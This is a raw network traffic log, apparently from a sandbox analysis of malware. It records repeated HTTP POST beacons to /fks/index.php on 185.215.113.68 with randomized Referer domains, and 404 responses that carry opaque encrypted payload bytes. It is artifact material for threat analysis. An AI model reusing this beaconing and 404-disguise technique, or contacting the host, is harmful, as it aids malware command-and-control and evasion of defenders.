4d 6d 2d 39 71 a6 78 48 e6 e6 35 05 63 f0 9f 3f 01 47 46 dd 52 47 a1 ca fa 41 f8 bc 46 27 d5 f4 df 70 1a 7d 06 e5 44 5f 14 f2 2d 7b 5e 08 0b dd 07 f9 09 d9 37 36 2b c4 c2 3c 51 1d e5 91 2b bc b6 9d 62 3e aa a7 79 3d 46 dc e9 c8 40 22 cf 5d f3 72 92 a6 91 a4 8f 42 ac 74 27 2c ee 50 f6 af a7 68 08 43 0d f9 be 2c ce c2 6c 6a 69 75 4d d7 03 e2 79 cb 43 b1 fc 11 17 68 35 d2 2d 0f f1 95 ba 94 14 ad 6e c1 bc cd 7c 79 6a da 0d 54 ff e7 dc 49 8c ff 3e cf 06 ec 23 cc f8 bf 40 bb 39 fe e2 ef a6 64 76 a1 2a 63 fa 2d 55 76 e9 b5 c5 55 ab 32 f8 24 34 a1 eb b5 e0 f7 a1 b9 c2 76 73 1e 40 28 2b aa 0a ee b9 30 21 bb 67 14 7b 5c 1e ed 69 db 63 02 21 5b d6 2f 9a f8 b9 77 6c 69 66 4b 83 2b ea e1 46 a8 5a 12 23 13 34 db 94 c8 4a 0c 4b e6 21 e2 22 f9 f0 16 ee 27 62 e8 a6 da 91 03 e9 a2 a3 a4 6a ba 49 62 3f b1 b1 96 fa d5 5d 18 67 0d b7 ee 7c f6 aa e7 28 29 79 d4 44 0d 6d bb a4 9a 60 05 e4 bd 7f 05 26 0c 8b ad 86 cd 92 8a fb a3 3b 69 5a 75 ba bc f7 5d 17 50 09 c6 16 36 b6 34 34 0f 45 2e 9f 8a 75 23 7a 82 57 8a f7 62 fe f5 b1 ac ad bf 2e aa 8a 88 ce 10 a6 36 d1 e5 e8 9c cb 16 0d f4 77 e7 20 c7 63 16 04 91 8e bb d5 7e e0 04 be d9 45 e2 0d 92 d2 ed 7d 7e af 04 60 67 23 9d 39 a0 f9 cd 50 7e 98 74 1d ac d8 88 b1 40 d6 42 50 7c 48 d1 0b 9e 8e 22 e3 50 64 56 9f 49 56 ab 4c 97 a8 ea 2e 90 a2 dc c3 71 29 51 16 51 bc ea c6 6f 91 9f 2a 63 4e 49 2a 0b Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rfI!(<zMu_!o@QCL@3sPu-\T+=$A&}t<KL<Qrk5c@]VOUq_E(HsvaaAJ,x{M+xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`U:CO!%LQ2u6xQypGS7q@7$lRN9LFtp>cAcun)d!b~(OYD6Hv}h`;]t-n$p~>?C3YF w0+.2p0?jryP@ ,6z\tpm-Q_/.Qy`Z,Mm-9qxH5c?GFRGAF'p}D_-{^76+<Q+b>y=F@"]rBt',PhC,ljiuMyCh5-n\|yjTI>#@9dvc-UvU2$4vs@(+0!g{\ic![/wlifK+FZ#4JK!"'bjIb?]g\|()yDm`&;iZu]P644E.u#zWb.6w c~E}~`g#9P~t@BP\|H"PdVIVL.q)QQocNI
Dec 27, 2023 18:12:35.926934004 CET	1286	IN	Data Raw: 66 8f 35 a1 88 2e 63 fd f9 5a 8c c6 6f 43 82 28 79 4e a5 22 9f 35 89 64 41 5b 70 64 cc 1b 19 b6 08 ff 46 cc a6 bf 1c 38 54 62 f8 38 56 c2 4c f6 4e 5e 4c 5f 52 a6 76 6d cc aa f8 84 64 18 0a 53 40 17 9b 7d 98 5e ce 8f 96 cb 1b 84 5d e4 95 3b 6e 21 Data Ascii: f5.cZoC(yN"5dA[pdF8Tb8VLN^L_RvmdS@}^];n!hj =\ZYE$~AO\|UKZ-K([Me3&&N-lEQL]3~l.=7.TJ;<)p6."\*_cv]!([p%D/~W
Dec 27, 2023 18:12:35.926950932 CET	1286	IN	Data Raw: 17 e8 e6 48 c9 84 d1 a3 c0 c2 cd 7c e7 8c 7b 81 6d 19 4e b8 e7 ea c5 62 7e 39 c5 fe 44 1f 29 a9 76 29 0f 04 79 55 4d 2c ae 39 ff 60 e8 22 bc 54 24 f0 49 33 b6 50 72 11 4f f2 52 02 44 56 04 35 e9 86 6c 29 5c 5f 8b 89 b6 24 3f eb 0a fe f4 f3 8e e8 Data Ascii: H\|{mNb~9D)v)yUM,9`"T$I3PrORDV5l)\_$?D'eSR `3tGNJ_): [+w!Xo`XKw[t/`GeW,^F)zc.m"#Z`$-`rOqxn)\ =^
Dec 27, 2023 18:12:35.926964998 CET	1286	IN	Data Raw: cd 51 53 90 61 73 92 a8 01 bb 70 a1 45 d9 23 83 8c 4f 85 62 8a 96 ca 4e 7f fb 25 82 8c 48 4a 98 90 73 70 ce 1e 6d 1b 32 fc 8f f8 30 85 72 89 a7 89 ce 62 a8 6c eb 66 ee a0 32 3b 93 b5 53 4a bd 3a 61 2b 6d bf 75 e9 5b ae 46 d0 41 08 32 c4 1e a5 79 Data Ascii: QSaspE#ObN%HJspm20rblf2;SJ:a+mu[FA2y0r$?_rz%QxN82-&':"n61M/SRlY~Ae/3'"XV\|c)J2rZrX}#Il}pT@N+xE(
Dec 27, 2023 18:12:35.927006006 CET	1286	IN	Data Raw: 37 04 71 06 aa 63 98 5e 47 f9 9e 5b cd fe 29 55 bc f7 c0 4d 62 27 4e 85 4d af 1a 08 ab 38 3f ac fb c9 b8 f5 a4 66 66 17 6a 81 1e f5 0a f3 ad 41 af 84 e4 45 0f 55 5f a6 ed 2f b4 7b 7d 58 a3 17 3f e7 96 5b 2f 41 68 48 a4 b2 a4 b6 ea 56 04 f6 09 bb Data Ascii: 7qc^G[)UMb'NM8?ffjAEU_/{}X?[/AhHV4?jnQ&o~ L (-"D}<cv\|*'"Ftp=_zur>o&"ispTOw3ryh$&,qIu.
Dec 27, 2023 18:12:37.570487976 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wqexdvvdlfgsmdc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: 185.215.113.68
Dec 27, 2023 18:12:37.877852917 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:37 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:12:37.915993929 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wjwvfruvcmtmjvq.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 322 Host: 185.215.113.68
Dec 27, 2023 18:12:38.212707043 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 62 37 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0d e1 6b 24 20 85 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 25 3c ff e5 84 e4 d3 18 7b 4d 8a a4 75 b4 a3 83 06 21 6f 40 51 f8 43 6b 14 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 67 97 24 47 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f cb d0 63 1a f8 bc 40 de dc fb 5d 56 9f 19 f6 ca 71 83 e8 b9 5f a5 70 18 93 83 95 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 1f 22 97 af a6 7b b2 16 ce a4 92 2b cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 80 dc 99 e8 b1 55 84 3a a6 f9 1a 89 4f 27 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ac 0c ac 6f 30 79 fe 76 7d e1 47 e4 3c 5b 53 e2 23 df 87 b4 03 85 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c 79 d3 19 09 04 07 25 fd 99 04 b9 3f 94 63 81 3b c2 75 a6 fc 29 2a 89 89 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 5b 82 36 53 65 d3 bf 08 48 f4 cc 76 de 0c 51 2e 02 b8 5d 68 3b 0e fa 50 b9 4a 5d 17 74 f9 ce 9e d2 be be 2c 6e 20 43 02 cf e7 24 bd 70 73 3e 3f 45 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 09 2b 75 30 50 d6 6a 72 f2 79 9b 0c 68 1b 0e 20 2c 44 fd 7a 5c 7a 07 d0 70 af 67 57 ec f4 d1 d3 cd b3 5b 17 9a ee b7 0f 64 23 51 79 48 8d ba 11 0f e4 4b d8 2c b7 6d 63 2d 39 71 99 a4 b7 19 19 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2a 59 d6 44 0d 6d 83 f7 65 9f fa c4 bd 7e 05 26 81 94 ad 86 cc 81 8a c3 6a c4 96 a5 64 b8 ab af 4e 15 68 64 c6 16 36 a7 34 25 0d 54 2c b7 9f 75 23 70 1e 6f f2 08 9d 01 e4 b1 bd af ae 2e bb 89 19 52 30 a6 36 d1 e5 96 a7 ca 16 09 8f 78 e6 20 c3 59 1e fb 6e 71 9d f5 7e e0 04 be e1 b8 1c f2 6d 63 53 3d 7c be 04 71 64 fa 01 01 b8 fb cd 55 6f 80 cb 0c 3d 0f 13 b2 43 44 1a 70 7c 03 d1 0b c5 43 6c fd 3d 48 22 b4 58 56 ba 4f 86 ac 76 16 d7 a2 dc c3 60 2b 71 16 50 bc ea f9 e8 6e 60 d5 43 48 49 2a 0b Data Ascii: 1fb7}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rfk$ !%<{Mu!o@QCk@3sPu-\T+g$G/}t<KL<Qrk5c@]Vq_psvaaAJ,"{+xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`U:O'%LQ2u6o0yv}G<[S#@7$lRN9Ly%?c;u)d!b~(O[6SeHvQ.]h;PJ]t,n C$ps>?E3YF w0+.2+u0Pjryh ,Dz\zpgW[d#QyHK,mc-9q`GFraF'pDU<-{T&U<U'CnC?UcGj"#rZht=RPhs.njidufy5OTh5.xjNTHx@`v,UrU9^>82G0!oy_jU_u]}kFK+aZ403a1)uIc,]t\|;YDme~&jdNhd64%T,u#po.R06x Ynq~mcS=\|qdUo=CDp\|Cl=H"XVOv`+qPn`CHI
Dec 27, 2023 18:12:41.222126007 CET	286	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fiwddlilpdwdwu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 350 Host: 185.215.113.68
Dec 27, 2023 18:12:41.518179893 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:12:41.546055079 CET	286	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yefvhecydthqjy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 164 Host: 185.215.113.68
Dec 27, 2023 18:12:42.064409971 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 c1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 ab 83 b0 ff 2a b3 09 e1 5f 13 27 2c b1 fb 9e 1a 14 f1 c9 e9 c1 0c f1 1b a8 05 23 3c ff 45 d5 e4 d3 c4 7a 4d 8a a4 75 b4 1d 3d 57 21 6f 60 51 f8 43 ab 45 cb 12 84 4f da 06 d9 b5 40 33 1c 73 50 71 9d 0d 97 2d a0 f8 5c 17 54 09 11 89 d2 af 2b e4 42 34 97 24 43 7f fe b3 ae 2f 7d c5 74 97 19 3c 4b c5 4c 11 86 84 3c 18 51 62 0c 6b 86 35 f0 b8 5e 7f 1f 88 d1 67 1a 47 ba ad bd dc fb 5d 56 ef a7 a7 ca da 83 eb b8 54 44 28 18 ef f2 90 8d 8b 03 de cc 76 61 e6 96 ce e0 61 ed 41 d3 4a 2c ff 0f 75 97 a3 a6 3b b2 1c 60 f5 92 37 cd ad 86 7d 68 90 77 1f b9 2d 53 6c c2 52 67 3a 85 75 20 6a d8 05 46 f2 fc 3e 7e 88 02 f4 b6 7e 90 41 40 c6 74 50 e5 bf ff 87 b0 6d 45 94 46 2b b2 59 3e 35 26 1f 18 d2 2b fd 11 df 00 0b bd 33 f6 3e 06 ef 9b f2 1d 66 7c 1b 4c 9b 93 8c e9 71 6c d3 08 44 42 c8 e8 b1 75 84 3a a6 59 4b 89 4f 23 25 db db 1c 4c 13 b7 f6 51 cc cb e3 f4 75 bd 93 f1 ba 18 df 68 cd 1b 51 79 fe ce 72 e1 47 e4 fc 0a 53 e2 33 df 87 b4 a7 d4 86 c2 26 44 c7 77 18 24 6c 52 c2 4e 14 c6 39 4c b9 fd bb 7e 76 fc 24 fd 99 78 70 3e 94 63 61 6a c2 75 6c fd 29 2a 3d d8 10 64 b9 90 fc d7 21 ce fd d6 16 1b 50 7b fa ad 1b ac f3 32 09 bc cc 08 48 f8 74 72 de 0c 95 7d 02 b8 5f 68 3b 0e 84 03 b9 4a 5d 17 74 d9 ce 9e b2 90 cc 48 0f 14 22 02 8d d9 07 bd 70 73 ee 3b 45 92 3c c9 cc bb 61 a5 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 bf 82 20 c6 84 b6 a6 f2 84 9c 77 30 56 2a e1 d7 e3 0b 2b d2 e4 26 1a 0c a4 69 88 89 09 2b 75 30 50 d6 6a 72 f2 79 9b 0c 28 1b 0e e0 02 36 8e 08 3f 7a 07 d0 e8 a3 65 57 ec e4 96 d3 cd bd 59 17 9a 1a b3 0f 64 23 51 79 48 8d ba 11 0f e4 4b d8 6c b7 6d 23 2d 39 71 99 a4 b7 19 19 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2a 59 d6 44 0d 6d 83 f7 65 9f fa c4 bd 7e 05 26 81 94 ad 86 cc 81 8a c3 6a c4 96 a5 64 b8 ab af 4e 15 68 64 c6 16 36 a7 34 25 0d 54 2c b7 9f 75 23 70 1e 6f f2 08 9d 01 e4 b1 bd af ae 2e bb 89 19 52 30 a6 36 d1 e5 96 a7 ca 16 09 8f 78 e6 20 c3 59 1e fb 6e 71 9d f5 7e e0 04 be e1 b8 1c f2 6d a5 66 64 1a 37 0e b2 a8 7e cd cd 74 35 01 9c a3 19 65 58 bb 01 e9 63 8f 8b d6 bc b0 85 1d c7 0f 1c 25 3a 09 8b 90 5c 94 9a 76 83 4a 60 ba da 1b f7 57 2f e1 c7 5d 1e 50 bc 6b c4 88 6e e7 d5 d7 4d 49 2a 80 Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-r_',#<EzMu=W!o`QCEO@3sPq-\T+B4$C/}t<KL<Qbk5^gG]VTD(vaaAJ,u;`7}hw-SlRg:u jF>~~A@tPmEF+Y>5&+3>f\|LqlDBu:YKO#%LQuhQyrGS3&Dw$lRN9L~v$xp>cajul)=d!P{2Htr}_h;J]tH"ps;E<a3YF w0V+&i+u0Pjry(6?zeWYd#QyHKlm#-9q`GFraF'pDU<-{T&U<U'CnC?UcGj"#rZht=RPhs.njidufy5OTh5.xjNTHx@`v,UrU9^>82G0!oy_jU_u]}kFK+aZ403a1)uIc,]t\|;YDme~&jdNhd64%T,u#po.R06x Ynq~mfd7~t5eXc%:\vJ`W/]PknMI
Dec 27, 2023 18:12:46.903330088 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://inbwbcfvgxnauna.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 224 Host: 185.215.113.68
Dec 27, 2023 18:12:47.200550079 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 18:12:47.637891054 CET	286	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dxpdmybqeylwtj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 347 Host: 185.215.113.68
Dec 27, 2023 18:12:47.934825897 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 17:12:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
